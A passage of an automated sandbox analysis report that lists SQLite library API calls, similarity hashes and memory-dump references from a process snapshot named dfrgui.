                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                              • String ID:
                                                                                              • API String ID: 1015584638-0
                                                                                              • Opcode ID: 5d56031a8bb84752336a9039dd8ba1404a2053eeba999a34ddac633c5ec7c6ae
                                                                                              • Instruction ID: 98e21844386c5f0eb86ad88f7432d10628e26b3a42b8c8f0e090f05616cc53f9
                                                                                              • Opcode Fuzzy Hash: 5d56031a8bb84752336a9039dd8ba1404a2053eeba999a34ddac633c5ec7c6ae
                                                                                              • Instruction Fuzzy Hash: 6631E035605B018BDB009FA8C6A47957BE2EF86318F29C5A9EC44CF35EE734D841CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E3300B
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3303E
                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E33058
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E33070
                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E3307C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_appendsqlite3_str_appendall$sqlite3_str_appendf
                                                                                              • String ID:
                                                                                              • API String ID: 3231710329-0
                                                                                              • Opcode ID: e866f743c30b3a94c2121f70096810fb02a0b0b762d4b88d13cd1d54cc961783
                                                                                              • Instruction ID: 30878b403b572a8ddf810af99fc1ca3b1dd9d579f515fb15a79ce77769efa307
                                                                                              • Opcode Fuzzy Hash: e866f743c30b3a94c2121f70096810fb02a0b0b762d4b88d13cd1d54cc961783
                                                                                              • Instruction Fuzzy Hash: F531F4B09057599BC710DFA9C89479EFBF1BF88314F24892DD488AB350D776A942CF41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E49852
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E4985D
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E49916
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E49921
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1477753154-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E38A11
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E38A29
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E38A4C
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E38A90
                                                                                              • sqlite3_memory_used.SQLITE3 ref: 61E38A95
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                                                              • String ID:
                                                                                              • API String ID: 2853221962-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,00000000,?,61E149F2), ref: 61E0AD0D
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,00000000,?,61E149F2), ref: 61E0AD49
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,00000000,?,61E149F2), ref: 61E0AD62
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,00000000,?,61E149F2), ref: 61E0AD75
                                                                                              • sqlite3_free.SQLITE3(?,00000000,?,61E149F2), ref: 61E0AD7D
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                              • String ID:
                                                                                              • API String ID: 251237202-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E335F6: sqlite3_realloc64.SQLITE3 ref: 61E33549
                                                                                              • sqlite3_free.SQLITE3 ref: 61E33BF6
                                                                                              • sqlite3_log.SQLITE3 ref: 61E33C77
                                                                                                • Part of subcall function 61E093E8: memcmp.MSVCRT ref: 61E09442
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: memcmpsqlite3_freesqlite3_logsqlite3_realloc64
                                                                                              • String ID:
                                                                                              • API String ID: 167025251-3916222277
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21628
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E2165C
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_append
                                                                                              • String ID: $,
                                                                                              • API String ID: 1074250351-71045815
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E2E80B
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text
                                                                                              • String ID: fa
                                                                                              • API String ID: 348685305-2923799766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3C3C1
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C3ED
                                                                                                • Part of subcall function 61E3C1B7: sqlite3_vmprintf.SQLITE3 ref: 61E3C1D0
                                                                                                • Part of subcall function 61E3C1B7: sqlite3_mprintf.SQLITE3 ref: 61E3C1EE
                                                                                                • Part of subcall function 61E3C1B7: sqlite3_free.SQLITE3 ref: 61E3C1FA
                                                                                                • Part of subcall function 61E3C1B7: sqlite3_free.SQLITE3 ref: 61E3C202
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_mprintf$sqlite3_vmprintf
                                                                                              • String ID: AND$NOT
                                                                                              • API String ID: 966554101-2843896482
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                                                              • String ID: winAccess
                                                                                              • API String ID: 2284118020-3605117275
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E36E74: sqlite3_value_text.SQLITE3 ref: 61E36E8A
                                                                                                • Part of subcall function 61E36E74: sqlite3_value_bytes.SQLITE3 ref: 61E36E97
                                                                                                • Part of subcall function 61E36E74: sqlite3_get_auxdata.SQLITE3 ref: 61E36ED2
                                                                                                • Part of subcall function 61E36E74: memcmp.MSVCRT ref: 61E36EFA
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3DB5C
                                                                                                • Part of subcall function 61E3D9F2: sqlite3_mprintf.SQLITE3 ref: 61E3DA44
                                                                                                • Part of subcall function 61E3D9F2: sqlite3_result_error.SQLITE3 ref: 61E3DA5E
                                                                                                • Part of subcall function 61E3D9F2: sqlite3_free.SQLITE3 ref: 61E3DA66
                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E3DC00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$memcmpsqlite3_freesqlite3_get_auxdatasqlite3_mprintfsqlite3_result_errorsqlite3_result_subtypesqlite3_value_bytes
                                                                                              • String ID: J$null
                                                                                              • API String ID: 3173415908-802103870
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3DD7D
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3DD9D
                                                                                              • sqlite3_result_value.SQLITE3 ref: 61E3DDE5
                                                                                                • Part of subcall function 61E3D74F: sqlite3_mprintf.SQLITE3 ref: 61E3D764
                                                                                                • Part of subcall function 61E3D74F: sqlite3_result_error.SQLITE3 ref: 61E3D77A
                                                                                                • Part of subcall function 61E3D74F: sqlite3_free.SQLITE3 ref: 61E3D782
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_value
                                                                                              • String ID: replace
                                                                                              • API String ID: 822508682-211625029
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E1BD95
                                                                                                • Part of subcall function 61E19649: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E192D3,?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19651
                                                                                              • sqlite3_realloc.SQLITE3 ref: 61E1BDE3
                                                                                              • sqlite3_free.SQLITE3 ref: 61E1BDF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                              • String ID: d
                                                                                              • API String ID: 211589378-2564639436
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1DA57
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_aggregate_context
                                                                                              • String ID: "$,$\
                                                                                              • API String ID: 2928764607-4027707629
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_int$sqlite3_result_blob
                                                                                              • String ID: <
                                                                                              • API String ID: 2918918774-4251816714
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E253DF: sqlite3_log.SQLITE3(?,?,?,?,?,61E25492), ref: 61E2541A
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E27FA9
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E27FE4
                                                                                                • Part of subcall function 61E22C1A: sqlite3_log.SQLITE3 ref: 61E22C43
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID: out of memory
                                                                                              • API String ID: 2575432037-2599737071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                              • API String ID: 1646373207-328863460
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1E4A4
                                                                                                • Part of subcall function 61E19E92: sqlite3_initialize.SQLITE3 ref: 61E19E9D
                                                                                              • sqlite3_free.SQLITE3 ref: 61E1E5BB
                                                                                              • sqlite3_result_error_code.SQLITE3 ref: 61E1E6DE
                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E1E6F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_malloc64sqlite3_result_doublesqlite3_result_error_code
                                                                                              • String ID:
                                                                                              • API String ID: 129515768-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                                                              • String ID:
                                                                                              • API String ID: 2374424446-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E1988D: sqlite3_malloc.SQLITE3 ref: 61E198BA
                                                                                              • sqlite3_free.SQLITE3 ref: 61E39476
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E394A9
                                                                                              • sqlite3_free.SQLITE3 ref: 61E39549
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_entersqlite3_stricmp
                                                                                              • String ID:
                                                                                              • API String ID: 3567284914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1F840
                                                                                                • Part of subcall function 61E19E92: sqlite3_initialize.SQLITE3 ref: 61E19E9D
                                                                                              • sqlite3_value_dup.SQLITE3 ref: 61E1F893
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E1F8C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_initializesqlite3_malloc64sqlite3_result_error_nomemsqlite3_value_dup
                                                                                              • String ID:
                                                                                              • API String ID: 2961385374-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E3DF0E
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3DF2E
                                                                                              • sqlite3_vfs_find.SQLITE3 ref: 61E3DF6D
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3E06C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                                                              • String ID:
                                                                                              • API String ID: 321126751-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                                                              • String ID:
                                                                                              • API String ID: 3596987688-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E22A68
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E22B00
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E22B20
                                                                                              • sqlite3_free.SQLITE3 ref: 61E22B28
                                                                                                • Part of subcall function 61E12EAE: sqlite3_free.SQLITE3 ref: 61E12F54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                                                              • String ID:
                                                                                              • API String ID: 4082161338-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E1499A), ref: 61E1487B
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E1499A), ref: 61E148D2
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E1499A), ref: 61E148EF
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E1499A), ref: 61E14916
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1477753154-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_stricmpsqlite3_value_text
                                                                                              • String ID:
                                                                                              • API String ID: 3779612131-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E2837B
                                                                                              • sqlite3_value_text16le.SQLITE3 ref: 61E28393
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E283A2
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E283BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_textsqlite3_value_text16le
                                                                                              • String ID:
                                                                                              • API String ID: 1617396527-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_bytes$memmovesqlite3_aggregate_context
                                                                                              • String ID:
                                                                                              • API String ID: 1185593704-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3B70A
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3B732
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3B743
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_create_function_v2.SQLITE3 ref: 61E3B788
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_create_function_v2sqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_mutex_leavesqlite3_vmprintf
                                                                                              • String ID:
                                                                                              • API String ID: 946922136-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3DA44
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3DA5E
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3DA66
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3DA70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                              • String ID:
                                                                                              • API String ID: 3282944778-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E92421
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E9243B
                                                                                              • sqlite3_realloc64.SQLITE3 ref: 61E92470
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E92498
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_realloc64
                                                                                              • String ID:
                                                                                              • API String ID: 1177761455-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_vmprintf.SQLITE3 ref: 61E3D2F8
                                                                                                • Part of subcall function 61E38ACB: sqlite3_initialize.SQLITE3 ref: 61E38AD2
                                                                                                • Part of subcall function 61E38ACB: sqlite3_str_vappendf.SQLITE3 ref: 61E38B1D
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3D322
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D32D
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_initializesqlite3_mprintfsqlite3_str_vappendfsqlite3_vmprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3342067426-0
                                                                                              • Opcode ID: 07e5b18904b5d9ccb0728645222c3b366c9ea9ada50209f98aeb96753600a031
                                                                                              • Instruction ID: a16d80c3e7785ae92544863e38b0ac3845678f14062f8dfa7d7a998e82dbeda9
                                                                                              • Opcode Fuzzy Hash: 07e5b18904b5d9ccb0728645222c3b366c9ea9ada50209f98aeb96753600a031
                                                                                              • Instruction Fuzzy Hash: D801DEB4A0835A9FD7409FBAD48465ABBF4FF88754F60882DD998C7300E734D851CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 3222608360-0
                                                                                              • Opcode ID: c671133aafb9068747cc4f67c3a9b708aaf11b571ed89a7cae954d0dfdb03e81
                                                                                              • Instruction ID: 0d5c316279a9773f5cba45c3f31516ab3692081abff3a4de9372598d1c346589
                                                                                              • Opcode Fuzzy Hash: c671133aafb9068747cc4f67c3a9b708aaf11b571ed89a7cae954d0dfdb03e81
                                                                                              • Instruction Fuzzy Hash: 2C014875604A168FCB00EFAAD4C4909BBF4FF89758B258558E8888F305D330E955CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_free.SQLITE3 ref: 61E0AA1B
